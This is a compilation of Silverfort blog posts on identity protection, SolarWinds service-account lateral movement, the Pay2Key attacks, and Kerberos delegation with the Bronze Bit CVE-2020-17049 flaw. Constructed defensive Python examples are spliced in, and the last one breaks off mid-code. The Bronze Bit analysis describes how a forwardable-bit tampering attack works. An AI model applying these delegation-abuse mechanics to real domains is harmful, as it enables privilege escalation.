Unified Identity Protection consolidates IAM security controls to confront the numerous identity attack vectors, and extends them to all enterprise users, assets and environments. To address identity-based threat vectors and overcome the detection and prevention gaps described in the previous section, Unified Identity Protection should be founded on the following pillars:

- Continuous Unified Monitoring of All Access Requests: To gain full visibility and enable accurate risk analysis, there is a need for ongoing, holistic monitoring of all access requests across all authentication protocols, of both user-to-machine and machine-to-machine access, and across all resources and environments. This includes every access attempt, whether to an endpoint, cloud workload, SaaS application, on-prem file server, legacy business application or any other resource. All the monitoring data should be aggregated into a unified repository to enable further analysis. Such a repository helps enterprises overcome the inherent problem of IAM silos and enables threat detection and analysis.
- Real-Time Risk Analysis for Each and Every Access Attempt: To effectively detect and respond to threats, each access request must be analyzed in real time to understand its context. This requires the ability to analyze the overall behavior of the user, i.e., all the authentications the user performs across any network, cloud or on-prem resource, not only at the initial network login but also at any further logins within these environments. This context enables a high-precision, real-time risk analysis that determines whether the provided credentials might be compromised.
- Enforcement of Adaptive Authentication and Access Policies on All Access Attempts: To enforce real-time protection, security controls like MFA, Risk-Based Authentication and Conditional Access must be extended to all enterprise resources across all environments.
Yet, as explained before, it is not practical to implement protections system by system, both because the dynamic nature of modern environments turns it into a never-ending task, and because many assets are simply not covered by existing IAM security solutions. To make this achievable for enterprises, these controls should be applied without direct integration with each of the different devices, servers and applications, and without massive architecture changes. There needs to be a way to seamlessly enforce protections in a holistic, unified way.

### Unified Identity Protection Integration with Existing IAM Solutions

It's important to clarify that Unified Identity Protection doesn't replace existing IAM solutions. Instead, it consolidates their security capabilities and extends their coverage to all assets, including ones they don't natively support, so that organizations can manage and protect all enterprise resources across all environments with unified policies and visibility.

### About Silverfort's Unified Identity Protection Platform

Silverfort now offers the first Unified Identity Protection Platform that closes both the detection and prevention gaps and prevents the wide range of identity attacks that target modern enterprises. Using a unique agentless and proxyless architecture, Silverfort monitors all access requests of both users and service accounts, across all assets and environments, extending high-precision Risk-Based Analysis, Conditional Access and Multi-Factor Authentication policies to cover all resources in the hybrid enterprise environment. Due to its agentless, proxyless architecture, Silverfort can also extend these protections to assets that couldn't be protected before, ensuring no system remains unprotected.

This short video explains the key use cases Silverfort's Unified Identity Protection Platform addresses:

Want to learn more or see a demo?
Schedule a meeting with one of our experts here.

---

- Published: 2021-01-24
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/service-accounts-key-role-in-sunburst-attack/

*****By Gal Sadeh, Lead Data Scientist, Silverfort*****

Research we have conducted at Silverfort Labs indicates that service accounts likely played a key role in the SolarWinds attackers' ability to move laterally within the victim's environment. This should serve as a wake-up call for enterprise security stakeholders. Service accounts are a vulnerable and sensitive attack surface that must be protected in order to harden an organization's overall security posture. The Silverfort Unified Identity Protection platform protects service accounts as part of its holistic protection of all accounts in the hybrid network. This article includes both a technical analysis of SolarWinds service account behavioral patterns and a demonstration of how Silverfort access policies could have protected against an attack scenario that uses these accounts for lateral movement and access to enterprise resources.

### Modeling the SolarWinds Service Accounts' Behavior

To protect against lateral movement based on service account credential theft, it is important to first understand the normal behavior of service accounts. This allows us to distinguish between the expected behavioral patterns and the patterns that characterize attackers. For example, the SolarWinds service account normally does not use the Remote Desktop Protocol (RDP) to authenticate to other machines, so any use of that protocol by that service account would be a red flag. For this purpose, we analyzed authentication data as well as findings from controlled attack simulations, and studied three types of service accounts SolarWinds uses to scan networks and access additional machines. In the attack scenarios we examined, these accounts can be used as the primary method for lateral movement.
Given the relative ease of using them for this purpose, it is likely they were exploited to carry out the SunBurst attacks as well. Let's start by understanding the standard behavior of each service account. The graphs in this section show a SolarWinds server as the middle node, with edges connecting it to various machines in the network.

Note: the actual names of the accounts are configured by the users in each specific environment. We've therefore given each type a descriptive name based on its authentication behavior.

### Service Account Type #1: RPCSS Scanner

- Activity: scans the network with the RPCSS service to remotely control other machines in the network. RPCSS allows the user to do almost anything on the remote machine, including executing code.
- Authentication protocol: Kerberos
- Service Principal Names (SPNs): CIFS, DNS, RPCSS, HOST, KRBTGT and LDAP
- Predictability: High
- Behavior sample:

Diagram 1: RPCSS Scanner service account activity pattern

### Service Account Type #2: General Scanner

- Activity: scans the network with various protocols and, when possible, uses RPCSS to gain elevated permissions on a remote machine. Occasionally, this type of service account uses NTLM.
- Authentication protocols: NTLM, Kerberos
- SPNs: RPCSS, HOST, KRBTGT and LDAP
- Predictability: Medium. While part of the activity is repetitive in terms of time and accessed machines, many activities cannot be mapped to a deterministic pattern.
- Behavior sample:

Diagram 2: General Scanner service account activity pattern

### Service Account Type #3: LDAP Scanner

- Activity: performs an LDAP query every 12 hours to track changes in the AD.
- Authentication protocol: LDAP
- Predictability: High
- Behavior sample:

Diagram 3: LDAP Scanner service account activity pattern

A more detailed activity breakdown of this service account is presented here:

Diagram 4: LDAP Scanner service account detailed activity breakdown

### Silverfort Protection Against SunBurst Service Account Compromise

Silverfort's Unified Identity Protection Platform uses dedicated access policies to prevent the use of compromised SolarWinds service accounts for lateral movement. The guideline in creating the policies was to capture the standard behavior of the accounts, and to block and alert on any detected deviation. Such deviations, slight as they may be, are unavoidable from the attacker's side, and blocking them enables the organization to react to the threat in time and thwart the attack.

### Service Account Type #1: RPCSS Scanner

This service account's standard behavior is to authenticate only with Kerberos. A Silverfort access policy that prevents this account from performing NTLM authentication would prevent it from being abused for lateral movement. You should also make sure the scanner authenticates only with the permitted Kerberos SPNs to the known set of servers; in the policy below these are the server names in the Destination field. Note that while NTLM is blocked altogether, the Kerberos part of the policy is more granular and applies only to SPNs that are not part of the account's normal access list (see Diagram 7).

Diagram 5: Silverfort 'RPCSS Scanner' protection policy

### Service Account Type #2: General Scanner

This type of service account features unpredictable behavior, posing a greater protection challenge. However, what is predictable is the set of machines this account normally accesses.
A policy that limits this account's access to only these machines would eliminate the risk of it being used to access other sensitive resources:

Diagram 6: Silverfort 'General Scanner' protection policy

For both of the policies above, choose only the relevant SPNs each scanner uses, for example:

Diagram 7: Silverfort granular Kerberos services protection for the RPCSS and General Scanner access policies

### Service Account Type #3: LDAP Scanner

Service accounts of this type have highly predictable behavior: performing LDAP queries every 12 hours to a distinct set of machines. A policy that limits the target resources of these accounts to this set of machines, and allows them to authenticate with LDAP only, would eliminate the lateral movement risk they introduce.

Diagram 8: Silverfort 'LDAP Scanner' protection policy

### Final Thoughts

In today's threat landscape, protection against the use of compromised credentials to access sensitive resources is often a missing link in the security stack of most enterprises. The SunBurst attack demonstrates once again that this lack of protection creates a critical risk exposure. The Silverfort Unified Identity Protection platform is purpose-built to confront and defeat the rising threat that identity attacks pose to your enterprise. Learn more about Silverfort Service Account Protection here.

---

- Published: 2021-01-07
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/why-identity-protection-is-needed-more-than-ever/

The Pay2Key attacks have targeted leading enterprises in the past couple of months with various ransomware, extortion and data theft attacks. These attacks did not feature any noticeable innovation on the offensive side. However, they do show that threat actors are increasingly targeting modern enterprises with compromised credentials, not only for the Initial Access stage but also for lateral movement.
The important role that compromised credentials play in today's attacks poses a critical challenge to security teams. This article analyzes two sample Pay2Key attacks, presents three actionable insights for enterprise security decision makers, and explains how Silverfort's Unified Identity Protection platform addresses this new reality, in which user identities have become a primary attack surface.

### Pay2Key Attack Example #1: RDP and Automated Ransomware Propagation

This attack was disclosed on November 8th, 2020, by Check Point. The attackers attempted to execute a mass ransomware campaign. To achieve that, they replaced the traditional weaponized email vector, often used for gaining initial access, with a more efficient technique: remote connection using compromised RDP credentials. Once they had established a connection with a machine within the targeted environment, they configured this machine as a pivot proxy to deliver the ransomware payload to other machines in the network. The actual propagation was done using PsExec automation, which enabled the ransomware to spread across the entire network within a single hour.

- Initial Access via compromised RDP credentials
- Persistence via configuration of the compromised machine as a C2C server
- Lateral Movement via PsExec

Diagram 1: Pay2Key Attack Example #1

### Pay2Key Attack Example #2: Supply Chain RDP and Manual Lateral Movement

A different attack took place at the beginning of December 2020 and featured a similar tactic for gaining Initial Access: as in the previous example, compromised RDP credentials were used to access a server of a third-party contractor that could connect to the target environment. From there, the attack followed a standard Lateral Movement process, with the attackers compromising additional credentials as they advanced and using them to log in to other production servers with PowerShell.
Eventually, the attackers managed to exfiltrate significant volumes of sensitive data and used it to extort their victim while threatening to leak the data to the public.

- Initial Access via supply chain server with compromised RDP credentials
- Lateral Movement via PowerShell scripts
- Persistence and Data Exfiltration via a backdoor on each compromised server

Diagram 2: Pay2Key Attack Example #2

### Security Insight 1: Compromised Credentials Are Now Extensively Used for the Initial Access Stage

By default, the immediate association with the 'Initial Access' stage of an attack is the use of malware and exploits. While in many cases this is still true, it's important to note that compromised credentials are taking an increasingly bigger role in this process. Verizon's 2020 DBIR states that using compromised credentials has topped exploits and backdoor malware as the hackers' preferred infection vector:

'...Malware has been on a consistent and steady decline as a percentage of breaches over the last five years. Why is this? Has malware just gone out of fashion like poofy hair and common courtesy? No, we think that other attack types such as hacking and social breaches benefit from the theft of credentials...'

### Security Insight 2: Lateral Movement Is a Compromised Credentials Problem

Malware authors work hard to make their attack vector appear as legitimate behavior to avoid detection. Unfortunately for the defending side, that isn't needed for the Lateral Movement stage. Once an attacker has successfully compromised user account credentials, the malicious login looks 100% legitimate, giving them direct access to additional machines. For a ransomware protection strategy, this means that the key to protecting against Lateral Movement lies in secure authentication, i.e., MFA and Conditional Access policies, tools that have proven effective against the use of compromised credentials.
However, these tools are not yet common practice for enterprise security teams.

### Security Insight 3: Compromised Credentials Are the New Identity Attack Surface

The new enterprise IT environment features hybrid on-prem and cloud networks and needs to support massive remote access to enterprise resources (a growing need driven by Covid-19). User account identities play a key role in accessing resources in this environment. This hasn't gone unnoticed by attackers, who are relentlessly pursuing your user account credentials, regardless of whether these are credentials for an on-prem file server, a SaaS application or a remote access VPN. It is time to acknowledge that identities are becoming a critical attack surface and that Identity Protection is needed more than ever.

### Silverfort Unified Identity Protection Platform

Silverfort is the first Unified Identity Protection platform that consolidates security controls across corporate networks and cloud environments to block identity-based attacks. Using innovative agentless and proxyless technology, Silverfort applies continuous monitoring, risk analysis and adaptive access policies to every authentication of every user account to any resource, on-prem or in the cloud. The Pay2Key attacks targeted RDP and Windows admin tools such as PsExec and PowerShell. If it were possible to enforce MFA on PowerShell and these other access methods, the attacks would have failed completely. Well, guess what? It's now possible.

### Silverfort vs. Pay2Key Attacks

To recap, the 'Initial Access' stage of this attack started with compromised RDP credentials. Silverfort enforces MFA for RDP connections to ensure legitimate access; because the attackers can't authenticate with the second factor, it would have blocked the attack's Initial Access stage and the attackers would never have penetrated the perimeter.
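
The baseline policies for the three SolarWinds scanner accounts (previous post) and the MFA-on-RDP/PsExec/PowerShell policy described here, as an added example that is not Silverfort's code or product configuration: a small Python policy engine evaluated over constructed authentication events. The account names, hostnames, baselines and events are assumptions made up for the example.

```python
"""Added example (not Silverfort's code or product configuration): a small
authentication policy engine covering the two policy kinds these posts describe.
  * Service-account baselines (SunBurst post): permitted protocols, Kerberos
    SPNs and destinations per scanner type; any deviation is blocked.
  * Admin MFA policy (Pay2Key and Exchange posts): human admins using RDP,
    PsExec or PowerShell Remoting need MFA unless they come from an admin host.
All account names, hostnames and events below are constructed for the example.
"""
from dataclasses import dataclass
from enum import Enum
from typing import Optional


class Verdict(Enum):
    ALLOW = "allow"
    BLOCK = "block"              # deviation from a service-account baseline
    REQUIRE_MFA = "require_mfa"  # human admin over a remote-admin method


@dataclass(frozen=True)
class AuthEvent:
    account: str
    protocol: str                      # "kerberos", "ntlm" or "ldap"
    source: str
    destination: str
    spn_service: Optional[str] = None  # Kerberos service class (cifs, rpcss, ...)
    method: Optional[str] = None       # "rdp", "psexec" or "winrm" for admin access


@dataclass(frozen=True)
class ServiceAccountBaseline:
    """Learned normal behaviour of one service-account type."""
    protocols: frozenset
    spns: frozenset          # permitted Kerberos service classes
    destinations: frozenset  # hosts the account is known to reach


@dataclass(frozen=True)
class AdminMfaPolicy:
    """Require MFA for listed admins on listed methods, except from admin hosts."""
    accounts: frozenset
    methods: frozenset
    trusted_sources: frozenset


def evaluate(ev, baselines, mfa_policies):
    """Return (verdict, reason) for one authentication event."""
    base = baselines.get(ev.account)
    if base is not None:
        # Service accounts: anything outside the learned baseline is a deviation.
        if ev.protocol not in base.protocols:
            return Verdict.BLOCK, f"protocol {ev.protocol} outside baseline"
        if ev.protocol == "kerberos" and ev.spn_service not in base.spns:
            return Verdict.BLOCK, f"SPN {ev.spn_service} outside baseline"
        if ev.destination not in base.destinations:
            return Verdict.BLOCK, f"destination {ev.destination} outside baseline"
        return Verdict.ALLOW, "matches service-account baseline"
    # Human accounts: remote-admin access from an untrusted host needs MFA.
    for pol in mfa_policies:
        if (ev.account in pol.accounts and ev.method in pol.methods
                and ev.source not in pol.trusted_sources):
            return Verdict.REQUIRE_MFA, f"{ev.method} admin access from {ev.source}"
    return Verdict.ALLOW, "no policy matched"


def audit(events, baselines, mfa_policies):
    return [(ev.account, *evaluate(ev, baselines, mfa_policies)) for ev in events]


# Constructed baselines mirroring the three scanner types in the SunBurst post.
BASELINES = {
    "svc-rpcss-scan": ServiceAccountBaseline(
        frozenset({"kerberos"}),
        frozenset({"cifs", "dns", "rpcss", "host", "krbtgt", "ldap"}),
        frozenset({"srv-01", "srv-02", "dc-01"})),
    "svc-general-scan": ServiceAccountBaseline(
        frozenset({"kerberos", "ntlm"}),
        frozenset({"rpcss", "host", "krbtgt", "ldap"}),
        frozenset({"srv-01", "srv-03", "dc-01"})),
    "svc-ldap-scan": ServiceAccountBaseline(
        frozenset({"ldap"}), frozenset(), frozenset({"dc-01", "dc-02"})),
}
MFA_POLICIES = [AdminMfaPolicy(frozenset({"adm-jdoe"}),
                               frozenset({"rdp", "psexec", "winrm"}),
                               frozenset({"admin-jump-01"}))]

# Constructed events: routine scanner traffic, the deviations a reused account
# would produce, then admin logins from untrusted and trusted hosts.
SAMPLE_EVENTS = [
    AuthEvent("svc-rpcss-scan", "kerberos", "sw-01", "srv-01", spn_service="rpcss"),
    AuthEvent("svc-rpcss-scan", "ntlm", "sw-01", "srv-01"),  # NTLM is a red flag
    AuthEvent("svc-rpcss-scan", "kerberos", "sw-01", "file-07", spn_service="cifs"),
    AuthEvent("svc-general-scan", "ntlm", "sw-01", "srv-03"),
    AuthEvent("svc-general-scan", "kerberos", "sw-01", "fin-db-01", spn_service="rpcss"),
    AuthEvent("svc-ldap-scan", "ldap", "sw-01", "dc-01"),
    AuthEvent("svc-ldap-scan", "kerberos", "sw-01", "srv-01", spn_service="cifs"),
    AuthEvent("adm-jdoe", "ntlm", "vendor-laptop", "srv-01", method="rdp"),
    AuthEvent("adm-jdoe", "kerberos", "admin-jump-01", "srv-02", spn_service="cifs", method="psexec"),
    AuthEvent("adm-jdoe", "kerberos", "ws-22", "dc-01", spn_service="http", method="winrm"),
    AuthEvent("alice", "kerberos", "ws-22", "srv-01", spn_service="cifs"),
]

if __name__ == "__main__":
    for account, verdict, reason in audit(SAMPLE_EVENTS, BASELINES, MFA_POLICIES):
        print(f"{account:18} {verdict.value:12} {reason}")
```

The RDP login from the untrusted vendor laptop and the WinRM login from a workstation come back as REQUIRE_MFA, while the scanner accounts' NTLM use and unknown destinations are blocked outright.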
- Initial Access via compromised RDP credentials is blocked by the Silverfort MFA policy on RDP connections

Diagram 3: Pay2Key Attack Example #1 Initial Access Protection

It's always important to apply additional defenses, in case the attackers are persistent and resourceful enough to succeed with another Initial Access technique. In that case, Silverfort would block the next stage, Lateral Movement, by enforcing MFA on the PsExec remote authentications on which the automated ransomware propagation relied:

- Initial Access established
- Persistence via configuration of the compromised machine as a C2C server
- Lateral Movement via PsExec is blocked by the Silverfort MFA policy on PsExec

Diagram 4: Pay2Key Attack Example #1 Lateral Movement Protection

In a similar manner, Silverfort would have prevented both the Initial Access and Lateral Movement stages of Pay2Key attack example #2. The RDP part is identical, so let's move to the part in which we assume the attacker did somehow manage to establish a foothold on one machine within the environment. Some aspects of the Lateral Movement part are worth focusing on:

- Initial Access established
- Lateral Movement via PowerShell scripts is blocked by the Silverfort MFA policy on PowerShell Remoting
- Persistence and Data Exfiltration via backdoor: only on the initially accessed server

Diagram 5: Pay2Key Attack Example #2 Lateral Movement Protection

In this case Silverfort prevents the Lateral Movement by applying MFA on remote PowerShell connections, ensuring only legitimate, valid users are executing it and limiting the attack to the single machine that was initially compromised.

### Final Thoughts

As we stated at the beginning of this article, the Pay2Key attacks are not unique in any manner.
But it is exactly this lack of uniqueness that should raise a flag for security teams worldwide: the common attacks, rather than the unique ones, are the ones likely to target your environment, and it is imperative to protect against them. In today's enterprise, identities are the keys to the kingdom's crown jewels. The Silverfort Unified Identity Protection platform is the first to provide your users' identities the protection they really need. Learn more about Silverfort here.

---

- Published: 2020-12-24
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/silverfort-revolutionizes-protection-against-lateral-movement-with-mfa/

*****By Keshet, Director of Product Marketing, Silverfort*****

MFA prevents 99.9% of account compromise. However, this extremely efficient security measure is currently inapplicable to core enterprise resources, first and foremost on-prem endpoints and servers. The recent SolarWinds attack showcases once again that protection against Lateral Movement is among the weakest points in today's security stack. Silverfort revolutionizes protection against Lateral Movement by introducing MFA to endpoint and server access in the on-prem environment, proactively preventing existing lateral movement techniques such as those used by the SolarWinds threat actors.

### Lateral Movement in the SolarWinds Attack: Overview

The Lateral Movement part of the SolarWinds attack followed well-known patterns: after the initial compromise, the attackers started a credential hunt that ultimately ended with obtaining admin credentials and logging in to the actual target (in this case the ADFS server). The logons to the various machines along the path were apparently carried out with remote access command-line tools (PsExec, PowerShell, etc.).
### Lateral Movement Protection Is Broken

It's worth mentioning that the Initial Access part of the SolarWinds attack featured extreme innovation, sophistication and creativity. That is not the case with the Lateral Movement part; however, that didn't make it any less effective. The sad truth is that Lateral Movement techniques and tactics haven't changed much in a decade, simply because they didn't have to: from the attackers' perspective there is no need to change something that works great. And unfortunately, in this case they are right. The enterprise security stack repeatedly fails against Lateral Movement. This is because, in essence, Lateral Movement is no more than logging in to machines with valid (though compromised) credentials. The existing security controls, whether placed directly on the endpoint or monitoring the network traffic, might at best detect that an anomalous login has occurred and raise an alert. However, they cannot actually do anything in real time to prevent the login from happening, which in most cases will be far too late. The key to preventing Lateral Movement is to understand the actual meaning of what we've just said: Lateral Movement is no more than logging into machines using valid credentials. In other words, it's an unsecured authentication we need to mitigate, and there is a purpose-built technology to thwart a scenario in which a threat actor attempts to access enterprise resources with valid credentials: Multi-Factor Authentication.

### MFA Is Not Available Against Lateral Movement

One of the few consensus points among security practitioners is the enormous value MFA provides. According to Microsoft, MFA in place prevents 99.9% of account compromise. However, the Active Directory based endpoints and servers, which are primary targets for Lateral Movement, are excluded from the protection MFA brings.
There is today no available technology that can enforce MFA on the remote access command-line tools attackers use to move laterally between machines. MFA is the most effective and proven technology for preventing malicious logins. Its absence from logins in the on-prem environment is what enables Lateral Movement to prosper, as we've seen in numerous APTs, including the latest SolarWinds attack.

### But What If...?

MFA can easily turn the tables on the attackers. With MFA in place, when the attacker provides the login credentials to the new machine, the actual user to whom these credentials belong receives a notification on their phone or desktop. The notification asks whether to allow or deny access to the machine, and the request would ultimately be denied because the actual user never performed this login attempt, so the attacker wouldn't be able to access the machine.

### Arm Your On-Prem Environment Against Lateral Movement with Silverfort

The Silverfort Unified Identity Protection Platform (UIPP) pioneers the extension of MFA across all enterprise resources and access methods. Silverfort is the first to introduce enforcement of an MFA access policy on access to on-prem endpoints and servers via remote command-line tools. A simple policy that requires MFA verification whenever a domain admin logs in using a remote access command-line tool would radically reduce the success rate of any Lateral Movement. This would apply even in a SolarWinds attack scenario where the attackers have managed to get their hands on an admin's credentials: while the attackers indeed have the credentials, they won't be able to use them to perform the actual login to the resources they target.

### Final Thoughts

How come the absence of MFA from the on-prem environment was taken for granted all this time?
This absence is so deeply rooted in the common mindset that most if not all security practitioners, hands-on and executives alike, probably don't even regard it as a security gap but rather as a reality we have to live with. Silverfort is here to change this reality.

Learn more on Silverfort here

---

- Published: 2020-12-14
- Modified: 2025-04-03
- URL: https://www.silverfort.com/blog/silverfort-bronze-bit-cve-2020-17049/

On December 8, the new Bronze Bit exploit of the CVE-2020-17049 Kerberos vulnerability was made public, adding another cutting-edge weapon to attackers' post-compromise arsenal. While the full fix of this vulnerability will not be enforced before February 8, 2021, Silverfort's Unified Identity Protection Platform delivers full protection against the Bronze Bit attack. Through its unique ability to enforce MFA and adaptive access controls on Active Directory authentication protocols, Silverfort introduces a new paradigm of defense against lateral movement attacks in Active Directory environments. A detailed analysis of the delegation types, CVE-2020-17049 and the Microsoft patch was performed by Silverfort's Security Researcher, Dor Segal, and is available here.

### The Journey Towards Secure Delegation

CVE-2020-17049 enables an attacker to bypass the Resource-based Constrained Delegation authentication security control. In general, Delegation refers to the ability of an Active Directory account to impersonate, or act on behalf of, another account in order to access resources with the other account's access privileges.
A common example is when a user accesses a web application: while it seems that the user accesses the web application directly, what happens in the backend is that the user account delegates its access privileges to a service account, which impersonates the user and accesses the app database on the user's behalf. From a security perspective, the concern is what happens if this mechanism is abused by an attacker. The first Delegation mechanism offered in AD, known as Unconstrained Delegation, introduced a significant risk since it enabled the impersonating service to access all the resources the delegating account could access. This concern led to the gradual evolution of delegation over the years, as shown in this table:

As can be seen clearly in the table, each generation reduces the risk by materially decreasing the number of delegating accounts, impersonating services and accessible resources. While the scenario of an attacker performing malicious delegation is still possible, its implications in terms of resource access are significantly narrowed. Resource-based Constrained Delegation is the most secure delegation type and is therefore currently the standard used in most Active Directory environments. Now that we have gained insight into Delegation, we can understand the impact of the Bronze Bit exploit.

### The Bronze Bit Attack – Impairing Delegation Security Controls

The Bronze Bit attack makes use of the CVE-2020-17049 vulnerability to enable an attacker to perform the following (extracted and edited from its author's blog): "An attacker can impersonate users which are not allowed to be delegated. This includes members of the Protected Users group and any other users explicitly configured as 'sensitive and cannot be delegated'." So, this attack takes us back in terms of risk exposure, increasing the attack surface to practically all user accounts within the environment.
### Microsoft CVE-2020-17049 Mitigation Activities

Microsoft released a patch for this vulnerability as part of the November 8th Patch Tuesday. However, due to various Kerberos authentication issues, a new patch was made available on December 8th. This patch provides enterprises protection against the exploitation of the vulnerability until the full enforcement of the Kerberos protocol fix, which will take place on February 8, 2021. Given the typical difficulties entailed in server security patching in general, and of Domain Controllers specifically, it's likely that despite the availability of the patches not everyone deploys them immediately. So, there is currently a significant risk exposure for these organizations.

### Silverfort Protection against Delegation Based Attacks

Silverfort Unified Identity Protection Platform is the only solution that consolidates monitoring, risk analysis and access policy enforcement for all user and service account authentications across all corporate networks and cloud environments. Due to its innovative agentless, proxyless technology, Silverfort can extend MFA to a wide range of resources that couldn't be protected before. This of course includes any authentication that uses the Kerberos protocol. It's important to note that when setting up a Silverfort policy for a user, the policy's security controls apply both to direct and to delegated authentications performed by the user. Let's see how this applies to the protection of both delegating and non-delegating user accounts.

### Protection against the Bronze Bit attack – delegating accounts

In practice, delegating accounts (i.e. accounts that are configured to allow delegation) are already protected by default due to Silverfort's continuous monitoring of Active Directory authentication protocols, which automatically identifies these accounts and factors the delegation into their risk score.
Thus, the following risk-based policy would trigger an MFA requirement whenever an anomalous authentication attempt takes place:

Whenever such an account's authentication attempt exceeds a medium risk score, an MFA requirement will pop up for the user. If the authentication was made by an attacker performing malicious delegation on behalf of this account, the account owner can block access by confirming that it is not their request.

### Protection against the Bronze Bit attack – non-delegating accounts

But how can we protect the user accounts that are not configured for delegation? The risk-based policy won't do here, since these accounts don't include the delegation factor, so a different approach is required. Let's recap the scenario we want to mitigate: an attacker has compromised a service account, let's call it account 1. The attacker wants to access a sensitive resource, let's call it resource 1, but cannot do so under the access privileges of account 1. With the Bronze Bit exploit, the attacker can use account 1 to impersonate a high-privileged account, which we will call account 2, that is configured to not allow delegation (for example, any member of the Protected Users group), in order to access resource 1. Account 1 is impersonating account 2 to access resource 1. Behind the scenes, prior to accessing resource 1, account 2 authenticates to account 1 in order to provide account 1 the ability to act on its behalf. Now, account 1 must be a service that is configured to allow impersonation. Since all the services that are configured to do so are already known (after all, they were configured by the domain administration team), all we need is the following policy:

The 'Non-Delegating Accounts' group stands for all user accounts configured not to delegate, while the 'Impersonating Service Accounts' group represents all the service accounts that are configured to allow impersonation.
Alternatively, if we want to deny delegation only while still allowing these accounts to access the resource directly, we could use the 'Source' field to limit the policy to delegated access only. In this case we recommend assigning 'Deny' as the protective action:

Since these accounts should never interact with delegating service accounts, no operational disruption should occur. This protection totally impairs the Bronze Bit attack. Even if the attacker managed to force a high-privileged account to attempt delegation, Silverfort will prevent its actual engagement with an impersonating service account.

Silverfort's protection against the Bronze Bit exploit demonstrates once again how applying adaptive access control to Active Directory authentication protocols, and specifically to the remote access command line tools attackers would use to launch the Bronze Bit attack, is imperative to deliver sufficient protection against lateral movement attacks.

Learn more about Silverfort here

---

- Published: 2020-12-13
- Modified: 2024-11-19
- URL: https://www.silverfort.com/blog/delegation-treats-cve-2020-17049/

*By Dor Segal, Security Researcher at Silverfort*

On November 11, 2020 Microsoft disclosed CVE-2020-17049, a new Kerberos Security Feature Bypass vulnerability. While the vulnerability itself will not be fixed before February 8th 2021, Microsoft has issued patches on November 8th and December 8th in order to mitigate its exploitation in the meantime. Very little was disclosed on the vulnerability's internal workings, with neither a public POC nor a technical analysis. This post attempts to fill some of this gap by shedding light on Kerberos Delegation in general and deep-diving into the patch Microsoft has issued for the CVE-2020-17049 KCD vulnerability itself.

### Kerberos Delegation 101

Kerberos Delegation is one of the most complicated concepts of the Kerberos authentication process.
This extension of the standard protocol was originally created to give services, and the service accounts they use, access to resources without actually granting them any kind of permissions. Since its initial introduction, delegation has gone through a couple of important changes until it became the Resource-based Constrained Delegation we use today (aka KCD). So, before we approach the vulnerability itself, let's review the different types of delegation and their respective pros and cons.

### Stage 1: Unconstrained delegation

Unconstrained delegation was introduced in Windows Server 2000 and was the first to allow services to impersonate a user with that user's access permissions. As the name indicates, this kind of delegation gives a service the power to use the user's credentials to access any resource at any time. The process requires the user to request a forwardable TGT and attach it to the service ticket. Then, the service takes the TGT and injects it into the lsass.exe local cache for later use. Nowadays we know this method is highly risky because it grants the delegated services unlimited access, which in case of compromise would enable the attacker to harvest all cached tickets and gain full access to all their privileges. This kind of delegation still exists today, mostly to support backward compatibility, and can be detected by querying for the ADS_UF_TRUSTED_FOR_DELEGATION flag in the userAccountControl attribute. This flag is also monitored by Silverfort, which reports on services using unconstrained delegation.

### Stage 2: Constrained delegation

The next generation of delegation is more limited: it allows the service to impersonate users only towards defined resources, and the "Account is sensitive and cannot be delegated" flag in Active Directory prevents specific users from being impersonated. This type of delegation is where the service performs authentication using the S4U2Self and S4U2Proxy extensions (MS-SFU). So how does it work?
Our service account must have the TRUSTED_TO_AUTH_FOR_DELEGATION flag turned on and the msDS-AllowedToDelegateTo attribute populated with the resource's SPN. A user authenticates as usual to the service using Kerberos negotiation (TGT & TGS). Now this starts to get complicated: the delegated service account requests a forwardable TGT for itself. We use this ticket to request a service ticket using S4U2Self, with the impersonated username in the cname PA-DATA field. The service takes this ticket and attaches it to the resource service ticket request (S4U2Proxy) with the constrained-delegation flag. The received ticket is an impersonation of the current user by our service.

### Stage 3: Resource-based Constrained Delegation

The major difference in this delegation is mostly administrative. Instead of permitting the service to be delegated access to a resource, we give the resource owner the power to define which service is allowed to perform delegation. This is configurable via PowerShell using the PrincipalsAllowedToDelegateToAccount parameter, or simply by editing the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

### Microsoft Security Patch for CVE-2020-17049 - Technical Analysis

Protocol vulnerabilities are always harder to mitigate due to the required backward compatibility support. We started looking at Microsoft's patch by reading the information published on the official website. We understood that the vulnerability is about "tampering tickets" and that it's located somewhere in the process of Kerberos Constrained Delegation. We chose to simulate delegation on a vulnerable Domain Controller and reproduce it on a patched one to check the difference:

The first noticeable change is in the length of each packet: we can see the self-signed ticket (S4U2Self) request is the same but its response is 40 bytes longer. This also applies to the next S4U2Proxy request and response, so what has changed?
A textual comparison wasn't helpful because the changed text is encrypted inside the ticket. After decrypting the cipher using the service's keytab, the text is readable but still needs to be understood. Looking at the AuthorizationData field we can see a new Unknown field, starting at offset 840 with a size of 20. Where does this new field come from? How does the KDC handle it?

What I love most about protocols is that most of them have regularly maintained and updated RFCs, and Kerberos is no exception. Visiting MS-SFU, we noticed it was updated on 11/23/2020. When we opened the Diff document we learned in section 3.2.5.2.2 that there is a new signature that is used to validate the integrity of the ticket. In addition, Microsoft's patch hints that the first modified ticket is the S4U2Self. We extracted some more information from the RFC by looking at the reference of Ticket Signature in MS-PAC 2.8.3:

"The KDC will use KDC (krbtgt) key, so that other KDCs can verify this signature on receiving a PAC."

"The ticket signature is used to detect tampering of tickets by parties other than the KDC. The ticket signature SHOULD be included in tickets that are not encrypted to the krbtgt account (including the change password service) or to a trust account."

"corresponding to the ticket signature will contain the value 0x00000010"

The MS-PAC RFC unveiled the mystery behind the unknown field at offset 840: it's a new ticket signature, encrypted using the krbtgt key to validate its integrity.

### Kerberos Bronze Bit

On December 8th an implementation of the CVE-2020-17049 KCD vulnerability, the Kerberos Bronze Bit attack, was released in more detail, shedding some more light on the manipulation of the S4U2Self ticket. The exploit deals with decrypting and editing the bit of the forwardable field inside the encRepPart of the ticket. A service with delegation ability can produce S4U2Self tickets for all users, even those with the "Account is sensitive and cannot be delegated" flag turned on.
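As an added example (not code from the post), the following parser walks a decrypted PAC's buffer table and reports whether the server, KDC and ticket signatures are present, which is the check the MS-PAC text above describes. The sample PACs are constructed with placeholder signature bytes and assume the 16-byte HMAC-MD5 signature type, so the ticket signature buffer is 20 bytes and the post-patch PAC comes out 40 bytes longer once its 16-byte PAC_INFO_BUFFER entry and alignment padding are counted.

```python
import struct
from dataclasses import dataclass

# PAC_INFO_BUFFER ulType values (MS-PAC 2.4). 0x10 is the ticket signature the
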